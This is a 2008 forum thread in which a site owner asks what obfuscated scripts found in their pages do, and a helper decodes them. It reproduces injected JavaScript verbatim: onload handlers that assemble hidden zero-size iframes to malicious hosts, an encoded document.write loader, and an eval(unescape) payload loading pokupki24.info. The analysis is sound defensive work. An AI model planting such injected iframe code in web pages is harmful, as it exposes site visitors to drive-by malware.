Hello ;
I need the help
I could not understand what they became , Can you explain .

<a href="<?php echo fileurl($fileid,$filetitle); ?>" target="_self"><img src="<?php echo $imageurl; ?>" onload="status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='t.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);" width="70" height="59" title="<?php echo $filetitle; ?>" alt="<?php echo $filetitle; ?>" border="0"></a>

and

<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);
">

Can we solve these encode .How can I encoded , What this codes . Trojan - Spam - bot or worm ..vs

The first one creates an iframe that points to h++p://194.145.235.34/t.php
The second creates an iframe that points to h++p://brbg.ru/.t.php

194.145.235.34 isn't responding but the other url redirects to h++p://89.208.35.26/1/index.php which, for me at least, only contains some obfuscated javascript that writes

Quote:

<center>Sorry! You IP is blocked.</center>

into the document.
-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/31/2008 07:57PM by tx.

Hmm , thx tx :)
How did you understand ?
How can I do , because meeting continuous , seeing .

in 89.208.35.26/1/index.php was written = Sorry! You IP is blocked

PHP source code
<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>

What is this ? Can you write one by one . What kind of encrypt . I didn't understand

Well looking at the first one for example:

status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='t.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);

if we put each statement on it's own line it's a lot easier to follow, read my comments:

status='';       // This does nothing
zz='2';          // This begins the part where the
sl='/';          // variables are initialized that
sf='ram';        // will later be concatenated together
pi='9';          // to form the actual strings necessary
po='.';          //       |
qu=':';          //       |
yh='4';          //       |
tr='t.p';        //       |
vo='3';          //       |
bw='5';          //       |
pt='tp';         //       |
ab='src';        //       |
dg='ht';         //       |
ko='e';          //       |
wd='if';         //       |
ji='hp';         //      _|_
hh='1';          //      \|/
                 //       V
t=wd.concat(sf,ko); // Concats variables sf and ko to wd. so now t = 'iframe'
xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);
// concats all of those variables to dg to create the string 'http://194.145.235.34/t.php'  and stores it in variable xx
var oE=document.createElement(t); // creates an iframe, reference is stored in oE
oE.setAttribute('width','0');   //iframe attributes
oE.setAttribute('height','0');  // more attributes
oE.setAttribute('style','display:none'); //more attributes
oE.setAttribute(ab,xx);  // sets the attribute ab (which = 'src') to the value of xx ('http://194.145.235.34/t.php')
document.body.appendChild(oE); //Finally, put the iframe in the body of the document.

-tx @ lowtech-labs.org

oo :)
Thank you very much
but
How can I decode ?

example:
xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji = [194.145.235.34]

What do you solve this code . pls can you give copy about this code

..................

what is this duty ? why do we use code

PHP source code
<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>



Edited 1 time(s). Last edit at 02/01/2008 12:14PM by ZeberuS.

I think you should read up on what concatenation is. the concat() function concatenates strings together, those strings are stored in the variables you see listed, ie: pt,qu,sl etc.

As for the second part of question, the author is attempting to hide what the javascript is actually doing. Which is pretty useless in javascript since it's run client side. For example, in this:

<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>

Simply replace the document.write() call with an alert() and run it in your Firebug console (or in the address bar if you prefer) to have the deciphered output alerted for you nice and easy.

-tx @ lowtech-labs.org

yes , fine

and
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%65%62%32%64%39%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%77%77%77%2e%70%6f%6b%75%70%6b%69%32%34%2e%69%6e%66%6f%2f%31%34%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%36%38%37%29%2b%27%63%31%36%34%5c%27%20%77%69%64%74%68%3d%35%39%31%20%68%65%69%67%68%74%3d%35%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

decode
|
v

window.status='Done';document.write('<iframe name=4eb2d93 src=\'http://www.pokupki24.info/14/index.php?'+Math.round(Math.random()*33687)+'c164\' width=591 height=57 style=\'display: none\'></iframe>')

" ai siktir vee? " :)

what is this :S